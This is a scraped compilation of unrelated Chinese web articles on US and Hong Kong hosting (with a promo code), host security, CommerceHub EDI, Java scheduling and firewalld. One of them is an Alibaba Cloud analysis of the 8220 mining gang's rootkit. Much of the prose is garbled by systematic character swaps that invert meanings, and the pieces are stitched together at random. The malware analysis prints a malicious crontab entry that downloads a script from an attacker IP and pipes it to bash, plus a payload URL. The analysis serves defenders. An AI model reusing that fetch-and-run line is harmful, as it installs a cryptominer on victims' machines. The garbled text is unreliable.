主机

　在抉择一个主机时，其带宽和网络速度是十分重要的思考因素。而美国主机在带宽和网络速度方面有着显著的劣势，成为了泛滥用户的首选。那么，美国主机的带宽和网络速度到底有多快呢?本文将通过剖析美国主机的网络基础设施和数据中心设施，以及介绍测试美国主机速度的办法，来解答这一问题。 一、美国主机带宽和网络速度的劣势 美国是寰球最大的互联网市场之一，其网络基础设施倒退非常先进。美国主机在带宽和网络速度方面有着显著的劣势，尤其是与一些发展中国家相比。同时，美国的互联网带宽占据寰球市场的比值也处于较高水平。 此外，美国主机的劣势还体现在数据中心和硬件设施上。美国的数据中心数量泛滥，其中很多数据中心都装备了先进的设施和技术，例如高效的制冷系统和不间断电源零碎。这些设施能够确保主机的运行稳定性和安全性，同时也能够进步主机的带宽和网络速度。 二、如何测试美国主机的带宽和网络速度? 抉择一个高速的美国主机能够进步咱们的网站速度，从而进步咱们的用户体验和网站SEO成果。然而，在抉择一个美国主机之前，咱们须要测试其带宽和网络速度。 上面是一些测试美国主机速度的办法： 1、应用速度测试工具 有很多在线工具能够测试美国主机的速度，例如Pingdom。这些工具能够测量主机的下载速度、上传速度和延迟时间等指标，以便咱们更好地理解主机的速度体现。 2、确认主机的网络供应商 网络供应商对美国主机速度有着至关重要的影响。咱们能够通过主机提供商的官方网站或者第三方评测网站来理解主机的网络供应商信息。同时，咱们也能够在论坛或社交媒体上寻求其余用户的倡议和教训。 3、查看主机的硬件配置 美国主机的硬件配置也会影响主机的速度体现。咱们能够查看主机的处理器、内存和硬盘等硬件配置信息，以理解主机的性能体现。 4、测试主机的响应工夫 美国主机的响应工夫指的是主机解决申请的工夫。咱们能够应用Ping命令或者Traceroute命令来测试主机的响应工夫。通过测试主机的响应工夫，咱们能够更好地理解主机的速度体现。 美国主机在带宽和网络速度方面具备显著的劣势，这得益于美国当先的网络基础设施和数据中心设施。咱们能够通过应用速度测试工具、确认主机的网络供应商、查看主机的硬件配置和测试主机的响应工夫等办法来理解主机的速度体现。正如Hostease的美国主机所展示的那样，CN2等国内线路的连贯以及大陆优化的反对也是美国主机带宽和网络速度如此之快的起因，而且应用过该主机的用户大多反馈能够凭借Share2023优惠码享半价折扣。

　在明天的数字时代，爱护计算机系统和数据安全至关重要。可怜的是，网络安全问题在过来几年中曾经成为全球性的问题。攻击者利用各种破绽和技巧来入侵零碎，以窃取敏感信息、加密数据或者毁坏零碎。在本文中，咱们将探讨美国主机常见的安全漏洞和防备办法，以帮忙你更好地爱护你的计算机系统和数据。 一、常见的主机安全漏洞 1、操作系统破绽 操作系统破绽通常是因为程序员的忽略或谬误造成的。这些破绽可能会容许黑客利用操作系统的谬误，来获取零碎的管理员权限或者管制整个零碎。 2、弱明码 弱明码是指明码太简略，容易被猜想或者破解的明码。这种明码可能会被攻击者利用，入侵零碎并拜访敏感数据。 3、软件破绽 软件破绽通常是因为程序员的谬误或者破绽造成的。这些破绽可能会容许黑客近程执行恶意代码，来获取零碎的管理员权限或者拜访敏感数据。 4、未经受权的拜访 未经受权的拜访是指黑客或其余未经受权的用户利用破绽或其余技巧拜访零碎或数据。这种攻打可能会导致数据泄露、零碎瘫痪或其余平安问题。 二、如何防备主机安全漏洞 以下是一些防备主机安全漏洞的办法： 1、及时更新软件和补丁 及时更新软件和补丁能够确保零碎和软件没有已知的安全漏洞，从而避免攻击者利用这些破绽入侵零碎。 2、强明码 应用强明码能够避免攻击者猜想或破解明码。强明码应该包含数字、字母和特殊字符，并且长度应该至多为12个字符。 3、限度用户权限 限度用户权限能够避免用户误操作或者歹意操作导致的平安问题。管理员应该依据用户的职责和须要，调配最小的权限。 4、装置杀毒软件和防火墙 装置杀毒软件和防火墙能够避免恶意软件和黑客入侵零碎。杀毒软件和防火墙能够检测和阻止恶意软件和网络攻击。 5、施行访问控制 施行访问控制能够限度用户对系统和数据的拜访。管理员应该施行拜访控制策略，确保只有受权的用户能够拜访敏感数据和零碎。 6、加密敏感数据 加密敏感数据能够避免黑客获取数据并读取其内容。管理员应该应用强加密算法加密敏感数据。 在明天的数字时代，爱护计算机系统和数据安全至关重要。主机安全漏洞是计算机系统中存在的平安问题，管理员应该采取一系列措施来防备主机安全漏洞。

　随着互联网技术的一直倒退，越来越多的人开始创立本人的网站来展现集体或企业的信息。而抉择适宜本人的美国主机空间则是网站建设过程中至关重要的一步。上面将介绍一些抉择适宜本人的美国主机空间的倡议。 一、确定网站需要 在抉择美国主机空间之前，首先须要明确本人的网站需要。比方，网站的类型、预期的流量、所需的存储空间、须要的数据库类型、网站平安等等。对于不同类型的网站，其所需的主机空间也会有所不同，因而在抉择主机空间之前，须要理解本人的网站需要。 二、思考主机空间稳定性和速度 主机空间的稳定性和速度是抉择主机空间的重要因素之一。一个稳固的主机空间可能确保网站的24小时在线，而疾速的访问速度则能够进步用户的体验。因而，在抉择主机空间时，须要思考其稳定性和速度。 三、抉择牢靠的主机供应商 抉择牢靠的主机供应商是抉择主机空间的要害。一个好的主机供应商可能为您提供良好的技术支持和服务，确保您的网站稳固运行。在抉择主机供应商时，须要思考其信誉度、服务质量、技术支持等因素。 四、价格因素 价格也是抉择主机空间的一个重要因素。在抉择主机空间时，须要思考其价格是否正当。不过，在抉择主机空间时，不应只看价格，而应综合思考以上几个因素，抉择性价比较高的主机空间。 五、评估和口碑 在抉择主机空间时，能够参考其余用户的评估和口碑。能够通过在线论坛、社交媒体等渠道理解其余用户的评估和教训，从而抉择一家口碑良好的主机供应商。 综上所述，抉择适宜本人的美国主机空间须要综合思考多个因素。须要依据本人的网站需要，抉择稳固、疾速、价格合理、口碑良好的主机空间供应商。只有抉择了适合的主机空间。

　近年来，随着互联网的遍及，人们对网站访问速度的要求也越来越高。尤其是在电商、金融等须要高速传输数据的畛域，网站速度的快慢往往间接影响用户的体验和信任度。针对这一问题，CDN减速技术应运而生。 CDN减速技术是一种分布式网络架构，利用遍布寰球的服务器节点，将网站的内容散发到离用户最近的节点，以缩小网络提早和带宽占用，从而进步网站的访问速度。在这种架构下，网站主机的地理位置也变得不那么重要了。 香港主机CDN减速，正是基于这种技术，以香港为核心，将网站内容散发到亚太地区各个节点，从而实现高速拜访。香港主机作为亚太地区最重要的互联网枢纽之一，其带宽和网络品质始终当先于其余地区。因而，抉择香港主机作为CDN减速服务的基地，能够极大地提高网站的响应速度和稳定性。 与此同时，香港主机CDN减速服务还有以下几个长处： 首先，CDN减速服务采纳分布式架构，能够无效升高单个节点的压力，进步整个网络的容错性和稳定性。即便某个节点呈现故障或负荷过大，也不会影响其余节点的失常运行，从而保障用户拜访的稳定性和可靠性。 其次，香港主机CDN减速服务还提供了多种性能优化性能，例如压缩、缓存、负载平衡等，能够帮忙网站进一步提高访问速度和用户体验。此外，CDN减速服务还能够提供平安防护性能，包含DDoS攻打防护、内容平安检测等，保障网站的安全性和可靠性。 最初，香港主机CDN减速服务价格合理，适宜各类网站应用。不论是小型集体网站还是大型企业网站，都能够依据本人的需要抉择不同的套餐和服务，以实现最佳的性价比。 综上所述，香港主机CDN减速服务能够帮忙网站实现高速拜访，进步用户体验和信任度。如果您的网站在亚太地区领有大量用户，或者须要高速传输数据，无妨思考应用香港主机CDN减速服务，以晋升网站性能和稳定性。

CommerceHub 为多渠道电子商务商家提供托管集成、直销配送和产品内容治理，旨在帮忙在线和实体零售商扩充和促成在线市场上的销售。CommerceHub将这些集成需要通过EDI（Electronic Data Interchange，中文名称是电子数据交换，也称为“无纸化贸易”）等技术标准化，以实现零售商、供应商和贸易搭档之间的高效交易。让CommerceHub成为了为Home Depot家得宝、Bed, Bath, & Beyond、Costco好市多、Best Buy百思买、chewy等多家零售商提供托管集成EDI的服务商。零售商的供应商和分销商常常应用 CommerceHub 门户手动解决来自这些零售商的电子商务订单，随着订单量的减少，工作量也日益减少，供应商能够通过CommerceHub与零售商建设 EDI 连贯，来实现订单的进一步自动化接管和治理。供应商在开始对接EDI前，需仔细阅读EDI设置文档，并理解 CommerceHub 或零售商对您的EDI设置提出的要求。此外，EDI作为一种以国际标准进行的通信形式，整个对接设置需进行严格的测试验证，开始前设置前可进一步理解其对接测试周期。 CommerceHub 的 EDI 对接形式CommerceHub 反对多种EDI通信协议和文件格式，让零售商和供应商之间传输电子商务信息。知行之云应用以下形式进行与 CommerceHub 传输 EDI 文件： VAN（增值网络）SFTP这两种对接形式都会将您与零售商的业务数据传输到 CommerceHub，但它们的工作形式不同。例如，SFTP（平安文件传输协定）是指通过SSH的FTP，是一个平安的FTP协定，这意味着SFTP能够很好的代替安全系数较差的FTP或手动脚本。SFTP通过平安的shell（SSH）连贯替换数据，并为企业提供高水平的爱护，以便在其零碎、交易搭档、企业内部人员和云之间共享文件传输。 VAN英文全称为Value Added Network，示意增值网络或是第三方专用网络提供商。VAN提供商专一于提供网络服务，其中包含EDI数据传输。VAN作为一种数据共享和通信形式，可实现企业之间的连贯，其流量费用及投入老本方面绝对较高，至今被多数国外企业所应用。 CommerceHub 不容许您在一个帐户下同时应用 SFTP 和 VAN 两种对接形式。如果您在同一个 CommerceHub 帐户上对接 Macy’s、Home Depot 和 Lowe’s，则所有EDI连贯都必须应用雷同的对接形式。 CommerceHub OrderStream EDI对接内容反对的性能接管洽购订单发送洽购订单确认库存同步发送发货告诉发送发票EDI报文850 洽购订单855 洽购订单确认856发货告诉810 发票846 库存告诉997 功能性确认高级设置与CommerceHub 的EDI对接由 知行之云进行，请分割咱们以开始与您的零售商进行EDI对接设置。 CommerceHub OrderStream EDI对接办法EDI对接指南1.在 CommerceHub 帐户上启用 OrderStream （1）知行之云 优先通过 SFTP 与 OrderStream 通信，请确保您的 OrderStream 帐户已设置为 SFTP 通信（2）请通过partnersetup@commercehub.com分割 CommerceHub， 让他们晓得您将通过 SFTP 与卖场建设EDI连贯，并为 知行之云 提供 SFTP 配置信息。 ...

近日，阿里云安全团队发现8220挖矿团伙为了更持久的驻留主机以获得最大收益，开始使用rootkit技术来进行自我隐藏。这类隐藏技术的使用在watchdogs等挖矿蠕虫使用后开始出现逐渐扩散和进化的趋势，此后预计主机侧的隐藏和对抗将成为主流。 背景阿里云安全团队蠕虫监控平台发现8220挖矿团伙的下载脚本出现更新，除了下载必要的驻留脚本、挖矿程序之外，新增加了一个 so文件的下载地址：http://107.174.47.156/1.so。 8220挖矿团伙是一个长期活跃的利用多个漏洞进行攻击和部署挖矿程序的国内团伙[1-2]，该团伙组合利用WebLogic XMLDecoder 反序列化漏洞(CVE-2017-10271)、Drupal RCE(CVE-2018-7600)、JBoss 反序列化命令执行漏洞(CVE-2017-12149)等多个漏洞进行攻击并部署挖矿程序进行牟利。 通过对相关脚本和该so的简单分析，我们确认8220团伙已经在其攻击工具包使用ProcessHider[3]对自身进行隐藏。ProcessHider是被众多恶意软件广泛利用的rootkit。挖矿蠕虫利用该工具使管理员难以通过常规手段检测到挖矿进程，从而提高挖矿进程的存活时间以最大化挖矿收益。随着时间的推移，可能会有越来越多的挖矿蠕虫加入rootkit功能。 蠕虫检测如果在云控制台看到明显的CPU 上升，机器整体性能卡顿，但是登录机器使用 PS/TOP 等命令却无法定位到具体占用CPU的进程，此时该机器就很可能已经感染此类使用 rootkit 进行隐藏的挖矿蠕虫。 1.主机检测该蠕虫利用LD_PRELOAD机制，使得自身的so文件先于系统加载，并通过劫持 readdir函数，使依赖该 API 返回的PS/TOP等系统命令无法正确返回结果 。 因此用户使用这些受影响的系统命令将无法看到真实的进程。 如上图所示，该蠕虫隐藏的进程关键字是kworkerds。 在主机侧可以使用以下命令对蠕虫进行检测 查看动态链接库#ldd /bin/top|grep usr /usr/local/lib/libkk.so (0x00007f0f94026000)发现存在异常的so文件查看 PRE_LOAD系统变量#cat /etc/ld.so.preload /usr/local/lib/libkk.so发现preload文件被修改查看 crontab#crontab -l */30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh发现crontab出现奇怪的定时任务使用普通top 查看到的进程: LD_PRELOAD依赖于动态链接过程，因此使用静态编译的busybox执行top命令，将可以看到真实的全部进程。 2.网络检测随着对抗的不断升级，挖矿蠕虫的自我隐藏功能必将不断升级，而面对全副武装的蠕虫病毒，普通用户在主机侧与其进行强对抗成本极高并且收益较低。针对该类蠕虫通过网络侧的NTA(Network Traffic Analysis)功能进行检测更加有效。因为无论攻击者在主机侧采用了何种隐藏手法，但其远程下载、C&C通信、矿池通信等行为均会在网络流量中留下痕迹。 下图是在网络侧云防火墙通过检测到主机感染后下载后门文件的行为发现该蠕虫的记录。 修复方案1.由于本地命令可能都已被劫持，因此首先下载静态编译的busybox来执行指令，保证执行的系统命令不受劫持影响。 下载二进制#wget https://www.busybox.net/downloads/binaries/1.27.1-i686/busybox赋予执行权限#chmod +x busybox2.清理动态劫持 ./busybox rm -f /usr/local/lib/libkk.so 2>/dev/null./busybox chattr -i /etc/ld.so.preload 2>/dev/null./busybox chattr -i /usr/local/lib/libkk.so 2>/dev/null./busybox rm -f /etc/ld.so.preload./busybox touch /etc/ld.so.preload./busybox chattr +i /etc/ld.so.preloadldconfig3.杀恶意进程和相关文件 ...

问题描述主机状态一直显示有问题，去向动态链接库请求数据时，除了第一台主机访问成功外，以后的每一台主机返回的结果都是9(HOST_NOT_FOUND)。研究了很久也没研究明白，最后求助潘老师。潘老师指出是指针有问题，主机的指针是我们构造出来的，虽然该指针指向对象的name和context与动态链接库服务那边的都一样，但是他那里可能是按地址处理的，不是同一个地址，就报主机找不到了。经过测试，确实是这样。不能直接构造指针，需要使用同步计算机数据时返回的指针进行操作。所以，获取计算机状态，操作计算机都需要重新同步一下计算机，将指针同步过来。假设用户操作很频繁的话，对动态链接库的压力就很大。指不定啥时候就炸了。虽然我想到了这点，但也没想到好的解决方案。潘老师最终的设计方案非常好，采用定时任务，当有计算机的操作时，不实时进行操作，而是先存起来，每隔一段时间统一进行操作，从而减轻服务器压力。实现设计对主机进行关机或重启时，不立即执行，而是将其添加到一个要执行的任务列表中，当定时任务触发后，再统一执行。定时任务定时任务很简单，之前在计量中写过一个每天晚上定时统计数据的定时任务，这次写这个没什么难度，都不需要看文档了。注释很详尽，相信聪明的你完全可以理解。这里的存储计算机状态设置了一个主机名到计算机状态映射的HashMap，这里没有用ConcurrentHashMap，因为只有定时任务一个线程进行put，其他接口调用该Map只负责查询，不会出现冲突。@Async@Scheduled(fixedRate = 10000) // 每隔10s执行public void hostHandle() { logger.info("— 开始执行定时任务 —"); logger.debug(“获取关机重启的订阅者”); Set<String> shutdownSubscribers = this.cloneStringSetAndClear(hostService.getShutdownSubscribers()); Set<String> rebootSubscribers = this.cloneStringSetAndClear(hostService.getRebootSubscribers()); logger.debug(“获取主机结构体指针Map”); List<HostStruct.ByReference> byReferenceList = baseService.getHostStructReferenceList(); Map<String, HostStruct.ByReference> byReferenceMap = baseService.getHostStructReferenceMap(byReferenceList); if (!shutdownSubscribers.isEmpty()) { logger.info(“存在关机订阅，执行关机操作”); for (String name : shutdownSubscribers) { logger.debug(“获取结构体指针并关机”); HostStruct.ByReference byReference = byReferenceMap.get(name); baseService.shutdown(byReference); } } if (!rebootSubscribers.isEmpty()) { logger.info(“存在重启订阅，执行重启操作”); for (String name : rebootSubscribers) { logger.debug(“获取结构体指针并重启”); HostStruct.ByReference byReference = byReferenceMap.get(name); baseService.reboot(byReference); } } logger.debug(“查询主机列表”); for (HostStruct.ByReference byReference : byReferenceList) { logger.debug(“查询主机指针，同时获取主机信息”); Integer status = baseService.getHostStatus(byReference); logger.debug(“添加到Map中”); hostService.getHostStatusMap().put(Native.toString(byReference.name), status); } logger.info("— 定时任务执行完毕 —");}/** * 克隆字符串集合并清空原集合 * @param primarySet 原集合 * @return 克隆的字符串集合 */private Set<String> cloneStringSetAndClear(Set<String> primarySet) { logger.debug(“新建集合”); Set<String> set = new HashSet<>(primarySet); logger.debug(“清空原集合”); primarySet.clear(); logger.debug(“返回”); return set;}todo目前是用Set存储要操作的主机，但是经过查询，HashSet、LinkedHashSet、TreeSet都是线程不安全的。这里就怕执行定时任务的时候，突然来了一个关机的指令，两个线程同时访问Set，定时任务要克隆一个Set然后把这个清空，关机需要在Set中添加元素，两个线程如果交替执行，结果就很难说了。去concurrent包下找，也没找到合适的。看了看，有第三方库实现的线程安全的Set，以后引入进来。这里不知道是不是我用的有问题，是并发场景下不推荐用Set吗？为什么concurrent包下没有相关的实现类？总结感叹一句：C++还是难啊！C++老师对我的评价是字写得还不错，哈哈哈。佩服C++工程师！ ...

一.前言Centos7以上的发行版都试自带了firewalld防火墙的，firewalld去带了iptables防火墙。其原因是iptables的防火墙策略是交由内核层面的netfilter网络过滤器来处理的，而firewalld则是交由内核层面的nftables包过滤框架来处理。 相较于iptables防火墙而言，firewalld支持动态更新技术并加入了区域（zone）的概念。简单来说，区域就是firewalld预先准备了几套防火墙策略集合（策略模板），用户可以根据生产场景的不同而选择合适的策略集合，从而实现防火墙策略之间的快速切换。区域对于 firewalld 来说是一大特色，但是对于我们使用Centos7一般是在服务器上，需要切换zone的需求比较少，所以本文不做介绍了，网上资料也比较多，大家可以去百度找找资料。二.操作与配置1.服务操作启动服务：systemctl start firewalld这里不用担心启用了防火墙以后无法通过ssh远程，22端口默认加入了允许规则停止服务：systemctl stop firewalld重启服务：systemctl restart firewalld查看服务状态：systemctl status firewalld2.配置文件说明firewalld 存放配置文件有两个目录，/usr/lib/firewalld 和 /etc/firewalld，前者存放了一些默认的文件，后者主要是存放用户自定义的数据，所以我们添加的service或者rule都在后者下面进行。server 文件夹存储服务数据，就是一组定义好的规则。zones 存储区域规则firewalld.conf 默认配置文件，可以设置默认使用的区域，默认区域为 public，对应 zones目录下的 public.xml三.命令这里需要首先说明的是，在执行命令时，如果没有带 –permanent 参数表示配置立即生效，但是不会对该配置进行存储，相当于重启服务器就会丢失。如果带上则会将配置存储到配置文件，，但是这种仅仅是将配置存储到文件，却并不会实时生效，需要执行 firewall-cmd –reload 命令重载配置才会生效。1.重载防火墙配置firewall-cmd –reload2.查看防火墙运行状态firewall-cmd –state3.查看默认区域的设置firewall-cmd –list-all4.应急命令firewall-cmd –panic-on # 拒绝所有流量，远程连接会立即断开，只有本地能登陆firewall-cmd –panic-off # 取消应急模式，但需要重启firewalld后才可以远程sshfirewall-cmd –query-panic # 查看是否为应急模式5.服务firewall-cmd –add-service=<service name> #添加服务firewall-cmd –remove-service=<service name> #移除服务6.端口firewall-cmd –add-port=<port>/<protocol> #添加端口/协议（TCP/UDP）firewall-cmd –remove-port=<port>/<protocol> #移除端口/协议（TCP/UDP）firewall-cmd –list-ports #查看开放的端口7.协议firewall-cmd –add-protocol=<protocol> # 允许协议 (例：icmp，即允许ping)firewall-cmd –remove-protocol=<protocol> # 取消协议firewall-cmd –list-protocols # 查看允许的协议8.允许指定ip的所有流量firewall-cmd –add-rich-rule=“rule family=“ipv4” source address="<ip>” accept"例：firewall-cmd –add-rich-rule=“rule family=“ipv4” source address=“192.168.2.1” accept” # 表示允许来自192.168.2.1的所有流量9.允许指定ip的指定协议firewall-cmd –add-rich-rule=“rule family=“ipv4” source address="<ip>” protocol value="<protocol>" accept"例：firewall-cmd –add-rich-rule=“rule family=“ipv4” source address=“192.168.2.208” protocol value=“icmp” accept” # 允许192.168.2.208主机的icmp协议，即允许192.168.2.208主机ping10.允许指定ip访问指定服务firewall-cmd –add-rich-rule=“rule family=“ipv4” source address="<ip>” service name="<service name>" accept"例：firewall-cmd –add-rich-rule=“rule family=“ipv4” source address=“192.168.2.208” service name=“ssh” accept” # 允许192.168.2.208主机访问ssh服务11.允许指定ip访问指定端口firewall-cmd –add-rich-rule=“rule family=“ipv4” source address="<ip>” port protocol="<port protocol>" port="<port>" accept"例：firewall-cmd –add-rich-rule=“rule family=“ipv4” source address=“192.168.2.1” port protocol=“tcp” port=“22” accept” # 允许192.168.2.1主机访问22端口12.将指定ip改为网段8-11 的各个命令都支持 source address 设置为网段，即这个网段的ip都是适配这个规则：例如：firewall-cmd –zone=drop –add-rich-rule=“rule family=“ipv4” source address=“192.168.2.0/24” port protocol=“tcp” port=“22” accept"表示允许192.168.2.0/24网段的主机访问22端口 。13.禁止指定ip/网段8-12 各个命令中，将 accept 设置为 reject 表示拒绝，设置为 drop表示直接丢弃（会返回timeout连接超时）例如：firewall-cmd –zone=drop –add-rich-rule=“rule family=“ipv4” source address=“192.168.2.0/24” port protocol=“tcp” port=“22” reject"表示禁止192.168.2.0/24网段的主机访问22端口 。四.参考资料firewalld防火墙详解 by xuad88.本文作者：晓晨master阅读原文本文为云栖社区原创内容，未经允许不得转载。 ...